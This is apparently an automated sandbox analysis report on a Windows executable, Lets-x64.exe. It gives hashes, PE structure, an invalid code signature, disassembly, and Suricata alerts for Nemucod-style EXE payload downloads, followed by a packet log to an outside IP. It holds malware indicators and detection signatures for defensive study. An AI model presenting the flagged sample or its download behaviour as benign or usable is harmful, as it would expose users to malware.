                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d...d...d...C\..g...d.......m...M...m.n.u...m.x.....m.i.e...m.j.e...Richd...........................PE..d....\mL.........." .........R..............................................p......w...............................................P.......`...(............ ...2......H....`.......................................................................................text...H........................... ..`.rdata..F...........................@..@.data...DA......."..................@....pdata...2... ...4..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                  C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                                                  File Type:JSON data
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):55
                                                                                                                  Entropy (8bit):4.306461250274409
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                  MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                  SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                  SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                  SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}

                                                                                                                  C:\inst.ini

                                                                                                                  Download File
                                                                                                                  Process:C:\Windows\SysWOW64\cmd.exe
                                                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                                                  Category:dropped
                                                                                                                  Size (bytes):2
                                                                                                                  Entropy (8bit):1.0
                                                                                                                  Encrypted:false
                                                                                                                  SSDEEP:3:y:y
                                                                                                                  MD5:81051BCC2CF1BEDF378224B0A93E2877
                                                                                                                  SHA1:BA8AB5A0280B953AA97435FF8946CBCBB2755A27
                                                                                                                  SHA-256:7EB70257593DA06F682A3DDDA54A9D260D4FC514F645237F5CA74B08F8DA61A6
                                                                                                                  SHA-512:1B302A2F1E624A5FB5AD94DDC4E5F8BFD74D26FA37512D0E5FACE303D8C40EEE0D0FFA3649F5DA43F439914D128166CB6C4774A7CAA3B174D7535451EB697B5D
                                                                                                                  Malicious:false
                                                                                                                  Reputation:unknown
                                                                                                                  Preview:..

                                                                                                                  Static File Info

                                                                                                                  General

                                                                                                                  File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                  Entropy (8bit):7.761977901083295
                                                                                                                  TrID:
                                                                                                                  • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                  • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                  • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                  • DOS Executable Generic (2002/1) 0.92%
                                                                                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                  File name:Lets-x64.exe
                                                                                                                  File size:21'353'869 bytes
                                                                                                                  MD5:a702cc254b31fbc4a5ec45fa16573521
                                                                                                                  SHA1:85c6aff84ebee14d9df214f1760a6bd4975e49ec
                                                                                                                  SHA256:887cf0ade18f096b4828e224f7f8a9fd2297c9fff930134e676af8b4d99455b9
                                                                                                                  SHA512:47b91de78c4aced688b0e09661b30b4d76a56d5c242d5416e63c744d3a107092b34b3728099cbc7e532b5f60e44067c97b3268dfefd579a39321a02f59d2a135
                                                                                                                  SSDEEP:393216:cec4Ie8M7oB2JNBXx9PMkglRy3mtFFu9zDVKZpV:FRh8B2vB2c+kZu
                                                                                                                  TLSH:E327015676F840E6D0BAC139C9928A4BD2F278410B35C7CF40905AAE1F777E24D2EF66
                                                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........>.V.P.V.P.V.P.M...i.P.M..._.P._..._.P.V.Q.2.P.M...O.P.M...W.P.M...W.P.RichV.P.........PE..d...L..O.........."......b...@.....

                                                                                                                  File Icon

                                                                                                                  Icon Hash:d082a7a9cba28082

                                                                                                                  Static PE Info

                                                                                                                  General

                                                                                                                  Entrypoint:0x140002d1c
                                                                                                                  Entrypoint Section:.text
                                                                                                                  Digitally signed:true
                                                                                                                  Imagebase:0x140000000
                                                                                                                  Subsystem:windows gui
                                                                                                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                  Time Stamp:0x4FDA0E4C [Thu Jun 14 16:16:12 2012 UTC]
                                                                                                                  TLS Callbacks:
                                                                                                                  CLR (.Net) Version:
                                                                                                                  OS Version Major:5
                                                                                                                  OS Version Minor:2
                                                                                                                  File Version Major:5
                                                                                                                  File Version Minor:2
                                                                                                                  Subsystem Version Major:5
                                                                                                                  Subsystem Version Minor:2
                                                                                                                  Import Hash:357b59ff56f808887438b8bd8ad0eaa6

                                                                                                                  Authenticode Signature

                                                                                                                  Signature Valid:false
                                                                                                                  Signature Issuer:CN=VeriSign Class 3 Code Signing 2010 CA, OU=Terms of use at https://www.verisign.com/rpa (c)10, OU=VeriSign Trust Network, O="VeriSign, Inc.", C=US
                                                                                                                  Signature Validation Error:The digital signature of the object did not verify
                                                                                                                  Error Number:-2146869232
                                                                                                                  Not Before, Not After
                                                                                                                  • 27/09/2018 20:00:00 01/02/2020 18:59:59
                                                                                                                  Subject Chain
                                                                                                                  • CN="Beijing Qihu Technology Co., Ltd.", OU=\u7814\u53d1\u90e8, O="Beijing Qihu Technology Co., Ltd.", L=Beijing, S=Beijing, C=CN
                                                                                                                  Version:3
                                                                                                                  Thumbprint MD5:E63D97F038C132F14F0E86E4383B7947
                                                                                                                  Thumbprint SHA-1:A50E0BABE5EE7DC261B0C122A8641A37E1CE4CE3
                                                                                                                  Thumbprint SHA-256:DBC27939DCD4AC7A333DD20BBC9AA254D0FFB691D2E0C2BD1F46A2ECF8C72002
                                                                                                                  Serial:4733BB6089E32FCD224D0E49DEB663DA

                                                                                                                  Entrypoint Preview

                                                                                                                  Instruction
                                                                                                                  dec eax
                                                                                                                  sub esp, 28h
                                                                                                                  call 00007FDC60BAABE0h
                                                                                                                  dec eax
                                                                                                                  add esp, 28h
                                                                                                                  jmp 00007FDC60BA8A37h
                                                                                                                  int3
                                                                                                                  int3
                                                                                                                  dec eax
                                                                                                                  mov dword ptr [esp+08h], ebx
                                                                                                                  dec eax
                                                                                                                  mov dword ptr [esp+10h], esi
                                                                                                                  dec eax
                                                                                                                  mov dword ptr [esp+18h], edi
                                                                                                                  inc ecx
                                                                                                                  push esp
                                                                                                                  dec eax
                                                                                                                  sub esp, 20h
                                                                                                                  dec esp
                                                                                                                  lea esp, dword ptr [00009324h]
                                                                                                                  xor esi, esi
                                                                                                                  xor ebx, ebx
                                                                                                                  dec ecx
                                                                                                                  mov edi, esp
                                                                                                                  cmp dword ptr [edi+08h], 01h
                                                                                                                  jne 00007FDC60BA8C08h
                                                                                                                  dec eax
                                                                                                                  arpl si, ax
                                                                                                                  mov edx, 00000FA0h
                                                                                                                  inc esi
                                                                                                                  dec eax
                                                                                                                  lea ecx, dword ptr [eax+eax*4]
                                                                                                                  dec eax
                                                                                                                  lea eax, dword ptr [0000A232h]
                                                                                                                  dec eax
                                                                                                                  lea ecx, dword ptr [eax+ecx*8]
                                                                                                                  dec eax
                                                                                                                  mov dword ptr [edi], ecx
                                                                                                                  call dword ptr [000053FDh]
                                                                                                                  test eax, eax
                                                                                                                  je 00007FDC60BA8C08h
                                                                                                                  inc ebx
                                                                                                                  dec eax
                                                                                                                  add edi, 10h
                                                                                                                  cmp ebx, 24h
                                                                                                                  jl 00007FDC60BA8BABh
                                                                                                                  mov eax, 00000001h
                                                                                                                  dec eax
                                                                                                                  mov ebx, dword ptr [esp+30h]
                                                                                                                  dec eax
                                                                                                                  mov esi, dword ptr [esp+38h]
                                                                                                                  dec eax
                                                                                                                  mov edi, dword ptr [esp+40h]
                                                                                                                  dec eax
                                                                                                                  add esp, 20h
                                                                                                                  inc ecx
                                                                                                                  pop esp
                                                                                                                  ret
                                                                                                                  dec eax
                                                                                                                  arpl bx, ax
                                                                                                                  dec eax
                                                                                                                  add eax, eax
                                                                                                                  dec ecx
                                                                                                                  and dword ptr [esp+eax*8], 00000000h
                                                                                                                  xor eax, eax
                                                                                                                  jmp 00007FDC60BA8BBDh
                                                                                                                  dec eax
                                                                                                                  mov dword ptr [esp+08h], ebx
                                                                                                                  dec eax
                                                                                                                  mov dword ptr [esp+10h], ebp
                                                                                                                  dec eax
                                                                                                                  mov dword ptr [esp+18h], esi
                                                                                                                  push edi
                                                                                                                  dec eax
                                                                                                                  sub esp, 20h
                                                                                                                  mov edi, 00000024h
                                                                                                                  dec eax
                                                                                                                  lea ebx, dword ptr [0000929Ch]
                                                                                                                  mov esi, edi
                                                                                                                  dec eax
                                                                                                                  mov ebp, dword ptr [ebx]
                                                                                                                  dec eax
                                                                                                                  test ebp, ebp
                                                                                                                  je 00007FDC60BA8BFDh
                                                                                                                  cmp dword ptr [ebx+08h], 01h
                                                                                                                  je 00007FDC60BA8BF7h

                                                                                                                  Rich Headers

                                                                                                                  Programming Language:
                                                                                                                  • [ C ] VS2010 SP1 build 40219
                                                                                                                  • [ASM] VS2010 SP1 build 40219
                                                                                                                  • [IMP] VS2008 SP1 build 30729
                                                                                                                  • [C++] VS2010 SP1 build 40219
                                                                                                                  • [RES] VS2010 SP1 build 40219
                                                                                                                  • [LNK] VS2010 SP1 build 40219

                                                                                                                  Data Directories

                                                                                                                  NameVirtual AddressVirtual Size Is in Section
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xaf7c0x64.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x100000x1ebbb.rsrc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0xf0000x5d0.pdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x1459e250x3768
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x2f0000x22c.reloc
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0x80000x2f8.rdata
                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                  Sections

                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                  .text0x10000x61d30x620046565b91f365f59e95911f623cd509caFalse0.5916374362244898data6.245804251873142IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                  .rdata0x80000x39480x3a009a2a098011201debfdbe2790cfc39397False0.3455010775862069dBase III DBT, version number 0, next free block index 46396, 1st item "j\267"4.71737238820107IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .data0xc0000x22000x1000ffa6e0e76a954e6a3fd657281ecc2607False0.1767578125data2.232690021204779IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                  .pdata0xf0000x5d00x600b0c923173cdcf0b82f939c3fafc6e4d7False0.4954427083333333data4.252873747775349IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .rsrc0x100000x1ebbb0x1ec00926e091618694e537b00d3d9325e5945False0.20641990599593496data4.868795024593366IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                  .reloc0x2f0000x3de0x4003e80cb8268adc697616a87179e434ae9False0.3896484375data3.553072991109634IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                  Resources

                                                                                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                  RT_CURSOR0x106400x134Targa image data - Map 64 x 65536 x 1 +32 "\001"0.4772727272727273
                                                                                                                  RT_BITMAP0x107740x328Device independent bitmap graphic, 16 x 16 x 24, image size 7680.10024752475247525
                                                                                                                  RT_ICON0x10a9c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 11520.24878048780487805
                                                                                                                  RT_ICON0x111040x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 5120.33602150537634407
                                                                                                                  RT_ICON0x113ec0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 2880.35450819672131145
                                                                                                                  RT_ICON0x115d40x128Device independent bitmap graphic, 16 x 32 x 4, image size 1280.41216216216216217
                                                                                                                  RT_ICON0x116fc0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.3744669509594883
                                                                                                                  RT_ICON0x125a40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.30866425992779783
                                                                                                                  RT_ICON0x12e4c0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.32142857142857145
                                                                                                                  RT_ICON0x135140x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.2543352601156069
                                                                                                                  RT_ICON0x13a7c0x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.09291080089908908
                                                                                                                  RT_ICON0x242a40x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.16190363722248466
                                                                                                                  RT_ICON0x284cc0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.22448132780082988
                                                                                                                  RT_ICON0x2aa740x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.324812382739212
                                                                                                                  RT_ICON0x2bb1c0x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.414344262295082
                                                                                                                  RT_ICON0x2c4a40x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.5434397163120568
                                                                                                                  RT_DIALOG0x2c90c0x6cdataChineseChina0.8148148148148148
                                                                                                                  RT_DIALOG0x2c9780x54dataChineseChina0.8333333333333334
                                                                                                                  RT_DIALOG0x2c9cc0x40dataChineseChina0.75
                                                                                                                  RT_DIALOG0x2ca0c0x54dataChineseChina0.8333333333333334
                                                                                                                  RT_STRING0x2ca600x58Matlab v4 mat-file (little endian) \367\213\011\220\351b\006R\250\217\207s'Y\216N8, numeric, rows 0, columns 0ChineseChina0.8068181818181818
                                                                                                                  RT_RCDATA0x2cab80x80dataEnglishUnited States1.0859375
                                                                                                                  RT_RCDATA0x2cb380x80ISO-8859 text, with no line terminatorsChineseChina0.09375
                                                                                                                  RT_GROUP_CURSOR0x2cbb80x14Lotus unknown worksheet or configuration, revision 0x11.25
                                                                                                                  RT_GROUP_ICON0x2cbcc0xcadata0.6089108910891089
                                                                                                                  RT_VERSION0x2cc980x2e0dataChineseChina0.49320652173913043
                                                                                                                  RT_MANIFEST0x2cf780x4d3XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.47692307692307695
                                                                                                                  None0x2d44c0x176fdata1.0018336389398232

                                                                                                                  Imports

                                                                                                                  DLLImport
                                                                                                                  KERNEL32.dll_lclose, GetModuleFileNameA, _lread, _llseek, _lopen, _lwrite, _lcreat, CreateDirectoryA, SetCurrentDirectoryA, lstrcatA, FreeLibrary, GetProcAddress, LoadLibraryA, GetDiskFreeSpaceA, GetFileAttributesA, RemoveDirectoryA, DeleteFileA, lstrlenA, GetCurrentDirectoryA, CloseHandle, GetExitCodeProcess, GetLastError, LocalFree, GetCurrentProcess, MoveFileExA, Sleep, GetStringTypeW, MultiByteToWideChar, LCMapStringW, HeapReAlloc, HeapSize, IsValidCodePage, lstrcpyA, GetTempPathA, CompareStringA, GetOEMCP, GetACP, GetModuleHandleW, ExitProcess, DecodePointer, HeapFree, HeapAlloc, GetCommandLineA, GetStartupInfoW, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, EncodePointer, LoadLibraryW, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, RtlVirtualUnwind, RtlLookupFunctionEntry, RtlCaptureContext, TerminateProcess, FlsGetValue, FlsSetValue, FlsFree, SetLastError, GetCurrentThreadId, FlsAlloc, RtlUnwindEx, WriteFile, GetStdHandle, GetModuleFileNameW, HeapSetInformation, GetVersion, HeapCreate, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, SetHandleCount, GetFileType, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, GetCPInfo
                                                                                                                  USER32.dllTranslateMessage, DispatchMessageA, PeekMessageA, wsprintfA, LoadCursorA, SetCursor, MessageBoxA, MsgWaitForMultipleObjects
                                                                                                                  ADVAPI32.dllGetTokenInformation, OpenProcessToken
                                                                                                                  SHELL32.dllShellExecuteExA

                                                                                                                  Possible Origin

                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                  ChineseChina
                                                                                                                  EnglishUnited States

                                                                                                                  Network Behavior

                                                                                                                  Suricata IDS Alerts

                                                                                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                  2024-12-29T16:09:26.781807+01002022482ET MALWARE JS/Nemucod requesting EXE payload 2016-02-011192.168.2.549717104.21.81.22480TCP
                                                                                                                  2024-12-29T16:09:29.499309+01002022482ET MALWARE JS/Nemucod requesting EXE payload 2016-02-011192.168.2.549720104.21.81.224443TCP
                                                                                                                  2024-12-29T16:09:29.920224+01002021954ET MALWARE JS/Nemucod.M.gen downloading EXE payload1104.21.81.224443192.168.2.549720TCP

                                                                                                                  Network Port Distribution

                                                                                                                  TCP Packets

                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                  Dec 29, 2024 16:09:25.429605007 CET4971780192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:25.550671101 CET8049717104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:25.551067114 CET4971780192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:25.551390886 CET4971780192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:25.672430992 CET8049717104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:26.781719923 CET8049717104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:26.781806946 CET4971780192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:26.784225941 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:26.784284115 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:26.784363031 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:26.793432951 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:26.793466091 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:28.130275965 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:28.130362034 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:28.194531918 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:28.194566011 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:28.195027113 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:28.195091009 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:28.196537971 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:28.243331909 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.499310017 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.499356985 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.499382973 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.499388933 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.499406099 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.499433994 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.499454021 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.499454021 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.499504089 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.499547005 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.499555111 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.499603033 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.507466078 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.507524014 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.507531881 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.507575035 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.515944004 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.516028881 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.516037941 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.516086102 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.524389029 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.526247025 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.709577084 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.709641933 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.709666967 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.709709883 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.713407040 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.713474989 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.719640970 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.719696999 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.719768047 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.719810963 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.727516890 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.727619886 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.727634907 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.727797031 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.735572100 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.735615969 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.743290901 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.743577003 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.743587017 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.743685007 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.751152039 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.751200914 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.751271963 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.751311064 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.759041071 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.759099007 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.759108067 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.759147882 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.759157896 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.759196997 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.767026901 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.767072916 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.774820089 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.774867058 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.774924040 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.774960041 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.782704115 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.782754898 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.782805920 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.782908916 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.790574074 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.790625095 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.920223951 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.920303106 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.920327902 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.920373917 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.923949957 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.923999071 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.931432009 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.931492090 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.931502104 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.931585073 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.931591988 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.931631088 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.938832045 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.938883066 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.938944101 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.939096928 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.946311951 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.946362019 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.961272955 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.961334944 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.968803883 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.968883038 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.976311922 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.976370096 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:29.991169930 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:29.991229057 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:30.006016970 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:30.006072998 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:30.020958900 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:30.021017075 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:30.028520107 CET44349720104.21.81.224192.168.2.5
                                                                                                                  Dec 29, 2024 16:09:30.028569937 CET49720443192.168.2.5104.21.81.224
                                                                                                                  Dec 29, 2024 16:09:30.043466091 CET44349720104.21.81.224192.168.2.5
